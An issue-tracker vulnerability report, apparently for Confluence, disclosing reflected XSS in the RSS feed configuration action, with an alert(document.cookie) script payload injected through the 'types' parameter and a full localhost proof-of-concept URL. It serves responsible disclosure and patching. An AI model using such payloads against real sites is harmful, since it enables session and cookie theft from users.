Details

    Description

      URL
      http://localhost:8080/dashboard/doconfigurerssfeed.action

      The RSS feed creation process is vulnerable to XSS attacks. It is possible to inject javascript code into the page by changing the types field to:

      types=>"><script>alert(document.cookie)</script>

      complete example from the testenvironment:
      http://localhost:8080/dashboard/doconfigurerssfeed.action?types=page&types=blogpost&types=mail&types=comment&types=>"><script>alert(document.cookie)</script>&sort=modified&showContent=true&showDiff=true&spaces=conf_global&labelString=&rssType=atom&maxResults=10&timeSpan=5&publicFeed=false&title=Confluence+RSS+Feed

      (NOTE This only renders correctly in IE, tested in IE 7.0, firefox does not execute the code)

      IMPORTANT: please confirm receipt of this notification! Depending on the response, we may report the
      vulnerability to publicly available security forums such as CERT (www.cert.org). Our policy is to give
      you at least 30 days grace period prior to any public disclosure.

      Attachments

        1. ConfigureRssFeedAction.class
          12 kB
          Brian Nguyen
        2. ConfigureRssFeedAction.class-2.7.3
          12 kB
          Brian Nguyen
        3. ConfigureRssFeedAction.class-2.7.3-java14
          12 kB
          Brian Nguyen
        4. ConfigureRssFeedAction.class-2.8.2
          12 kB
          Brian Nguyen
        5. ConfigureRssFeedAction.class-2.8.2-java14
          12 kB
          Brian Nguyen

        Activity

          People

            bnguyen Brian Nguyen (Inactive)
            9454181e1678 Thomas Jaehnel
            Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: